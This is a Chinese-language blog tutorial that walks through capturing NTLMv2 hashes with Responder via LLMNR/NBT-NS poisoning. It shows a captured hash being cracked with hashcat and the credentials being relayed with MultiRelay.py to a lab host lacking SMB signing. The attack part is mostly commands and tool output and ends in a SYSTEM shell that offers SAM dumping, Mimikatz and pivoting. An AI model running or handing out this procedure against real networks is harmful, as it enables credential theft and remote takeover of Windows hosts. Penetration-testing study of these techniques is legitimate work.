使用Responder获取ntlmv2 hash

使用Responder获取ntlmv2 hash

Responder配置

下载

https://github.com/lgandx/Responder

Responder工具可以污染LLMNR和NBT-NS请求。
在目录下的Responder.conf可以配置启用的模块
如果只需要获取ntlmv2hash使用默认配置即可,之后使用Hashcat进行暴力破解
如果要使用ntlm中继,需要对配置文件进行修改
使用Responder获取ntlmv2 hash

获取ntlmv2hash之后进行爆破

kali自带了Hashcat,省去了安装的麻烦
在linux上解压好Responder后进入目录执行

获取ntlmv2

python Responder.py -I eth0

这里的eth0为监听的网卡,
经过本地测试域环境和工作组环境均可获得ntlmv2hash
使用Responder获取ntlmv2 hash
获取之后会在./log下可以看到获取的记录
使用Responder获取ntlmv2 hash

使用hashcat爆破密码

hashcat -m 5600 Administrator::TEST:2f1fd6519d27c804:35A20084194A2D444D5B5906CC393F7A:010100000000000059F7CBA1FF0FD701EF20F0B734BED7430000000002000800540045005300540001000400410044000400100074006500730074002E00780079007A0003001600610064002E0074006500730074002E00780079007A000500100074006500730074002E00780079007A000700080059F7CBA1FF0FD70106000400020000000800300030000000000000000000000000300000D005ED9DB38DCB10E70E4FEE54BFAB5FB02D082A9E1F9CE53FE6C28EF2D9CB8A0A0010000000000000000000000000000000000009001E0063006900660073002F007500730065007200310032003100330032003200000000000000000000000000 /root/1234.txt --force

这里的5600代表ntlmv2,为了更快的测试,这里使用几个密码进行测试
使用Responder获取ntlmv2 hash

中继获得shell

使用这种方法的前提条件是没有开启smb签名验证,默认情况下只有域控使用了smb签名验证
开启方法可以参考

https://www.cnblogs.com/xiejn/p/13686620.html

配置Responder.conf
使用Responder获取ntlmv2 hash
./tools下有RunFinger.pyMultiRelay.py
使用RunFinger.py验证smb签名

python RunFinger.py -i 192.168.164.138
[root@localhost tools]# python RunFinger.py -i 192.168.164.138
[SMB2]:['192.168.164.138', Os:'Windows 7/Server 2008R2', Build:'7601', Domain:'WIN-ORHR1E13JIO', Bootime: 'Last restart: 2021-03-03 17:08:46', Signing:'False', RDP:'True', SMB1:'Enabled']

使用MultiRelay.py进行中继

python3 MultiRelay.py -t 192.168.164.138 -u ALL

这里的ip应该一致,即被攻击的ip应该未开启smb签名验证
模拟使用smb服务
使用Responder获取ntlmv2 hash
这里随便请求一个主机即可

[root@localhost tools]# python3 MultiRelay.py -t 192.168.164.138 -u ALL

Crypto lib is not installed. You won't be able to live dump the hashes.
You can install it on debian based os with this command: apt-get install python-crypto
The Sam file will be saved anyway and you will have the bootkey.


Responder MultiRelay 2.5 NTLMv1/2 Relay

Send bugs/hugs/comments to: laurent.gaffie@gmail.com
Usernames to relay (-u) are case sensitive.
To kill this script hit CTRL-C.

/*
Use this script in combination with Responder.py for best results.
Make sure to set SMB and HTTP to OFF in Responder.conf.

This tool listen on TCP port 80, 3128 and 445.
For optimal pwnage, launch Responder only with these 2 options:
-rv
Avoid running a command that will likely prompt for information like net use, etc.
If you do so, use taskkill (as system) to kill the process.
*/

Relaying credentials for these users:
['ALL']


Retrieving information for 192.168.164.138...
SMB signing: False
Os version: 'Windows Server 2008 R2 Datacenter 7601 Service Pack 1'
Hostname: 'WIN-ORHR1E13JIO'
Part of the 'WORKGROUP' domain
[+] Setting up SMB relay with SMB challenge: 9707c4caa56863f4
[+] Received NTLMv2 hash from: 192.168.164.139 
[+] Client info: ['Windows Server 2008 R2 Datacenter 7601 Service Pack 1', domain: 'WORKGROUP', signing:'False']
[+] Username: Administrator is whitelisted, forwarding credentials.
[+] SMB Session Auth sent.
[+] Looks good, Administrator has admin rights on C$.
[+] Authenticated.
[+] Dropping into Responder's interactive shell, type "exit" to terminate

Available commands:
dump               -> Extract the SAM database and print hashes.
regdump KEY        -> Dump an HKLM registry key (eg: regdump SYSTEM)
read Path_To_File  -> Read a file (eg: read /windows/win.ini)
get  Path_To_File  -> Download a file (eg: get users/administrator/desktop/password.txt)
delete Path_To_File-> Delete a file (eg: delete /windows/temp/executable.exe)
upload Path_To_File-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \windows\temp\
runas  Command     -> Run a command as the currently logged in user. (eg: runas whoami)
scan /24           -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to
pivot  IP address  -> Connect to another host (eg: pivot 10.0.0.12)
mimi  command      -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)
mimi32  command    -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)
lcmd  command      -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)
help               -> Print this message.
exit               -> Exit this shell and return in relay mode.
                      If you want to quit type exit and then use CTRL-C

Any other command than that will be run as SYSTEM on the target.

Connected to 192.168.164.138 as LocalSystem.
C:\Windows\system32\:#

成功获得shell
不过在本地复现时,在域环境下的机器无法被中继成功,检查时发现也无法通过正常的登录方法来登录smb服务,从新克隆一台机器未加入域环境可以使用,可能是我的虚拟机异常

参考文章

https://xz.aliyun.com/t/3560

上一篇:JexBoss-20170328


下一篇:数组